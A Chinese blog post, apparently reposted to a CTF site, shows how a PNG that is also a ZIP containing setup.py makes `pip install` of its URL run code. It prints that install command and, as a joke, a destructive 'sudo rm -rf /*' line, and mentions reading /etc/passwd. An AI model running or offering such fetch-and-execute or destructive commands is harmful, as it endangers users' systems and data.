Python PIP自解压的命令执行

渗透技巧 2年前 (2022) admin
791 0 0

Python PIP自解压的命令执行


    起源于某神秘论坛上的一个大佬分享可一个小技巧,通过pip 安装一个图片然后就执行了命令。很神奇。在这里分享给大家

在linux 机器上执行以下命令

pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"

结果就会出现最开始的图片。

最开始我一直还在系统找setup.py 在哪个位置。一直没找到,直到我群里的一位大佬冒出了一张图。

Python PIP自解压的命令执行

    这不得好好请教一下大佬,抱紧大佬大腿

    经过大佬的点拨,我直接把上面的图片下载下来后,改后缀名为ZIP 然后再解压,直接就出现了setup.py 文件。

Python PIP自解压的命令执行

文件里就出现了 所期待的命令。

sudo rm -rf /*

 啊!不对 是 

/etc/passwd


官方PIP源码

https://github.com/pypa/pip/blob/d0051d3266ba11e7410a43a040dfd409af88a1db/src/pip/_internal/utils/unpacking.py#L229-L257

Python PIP自解压的命令执行

挺好玩的

你们去玩吧

不要搞事情,不要搞事情不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情,不要搞事情

熟读网络安全法

不然法外狂徒张三都救不了你


Python PIP自解压的命令执行
Python PIP自解压的命令执行

扫描二维码获取

更多精彩

Python PIP自解压的命令执行

洛米唯熊

原文始发于微信公众号(洛米唯熊):Python PIP自解压的命令执行

版权声明:admin 发表于 2022年10月24日 下午10:54。
转载请注明:Python PIP自解压的命令执行 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...